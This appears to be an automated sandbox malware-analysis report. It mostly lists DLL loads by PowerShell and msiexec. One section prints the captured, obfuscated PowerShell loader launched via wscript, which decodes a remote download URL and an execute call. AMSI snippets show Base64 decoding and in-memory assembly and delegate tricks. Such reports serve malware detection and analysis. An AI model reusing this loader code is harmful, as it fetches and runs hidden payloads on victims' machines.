              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: *.pdbS source: powershell.exe, 00000001.00000002.1956313981.000002681D883000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2175218431.0000000007450000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ment.Automation.pdb source: powershell.exe, 00000006.00000002.2175218431.0000000007431000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ows\dll\System.Core.pdbsAF source: powershell.exe, 00000001.00000002.1955638921.000002681D7FE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbx source: powershell.exe, 00000001.00000002.1956313981.000002681D883000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2181957745.000000000823C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.pdbnA source: powershell.exe, 00000001.00000002.1955638921.000002681D7FE000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionern", "0")
              Source: Yara matchFile source: 00000006.00000002.2185161641.000000000B0D5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2184830111.0000000008800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2169361700.00000000059A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Blndet)$GlOBAl:byCYKleRnE = [sYsTEM.text.ENcODIng]::AScIi.GEtstrINg($fEUDalLY)$GLobAL:BaJEres=$bYCyKLerNE.SUbStRING($GOSPELS,$FlApR2)<#Idelrens Herma Nanetts Mouthful #>$Visiteredes=
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Toothily $Transpositively $Ilexes), (Kvlerne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Adoniserne = [AppDomain]::CurrentDomain.GetAssemblies()$global
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fllesinteressen57)), $Suppresion).DefineDynamicModule($Scrutinizes, $false).DefineType($Jockeydom, $Coshered, [System.MulticastDelegat
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Blndet)$GlOBAl:byCYKleRnE = [sYsTEM.text.ENcODIng]::AScIi.GEtstrINg($fEUDalLY)$GLobAL:BaJEres=$bYCyKLerNE.SUbStRING($GOSPELS,$FlApR2)<#Idelrens Herma Nanetts Mouthful #>$Visiteredes=
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B951229 pushad ; iretd 1_2_00007FFD9B951249
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0761A3C8 pushfd ; ret 6_2_0761A5FD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043891E pushad ; iretd 8_2_0043891F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00438C2F pushfd ; iretd 8_2_00438C30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00432D49 push 8BFFFFFFh; retf 8_2_00432D4F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00438DDF push esp; iretd 8_2_00438DE0
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
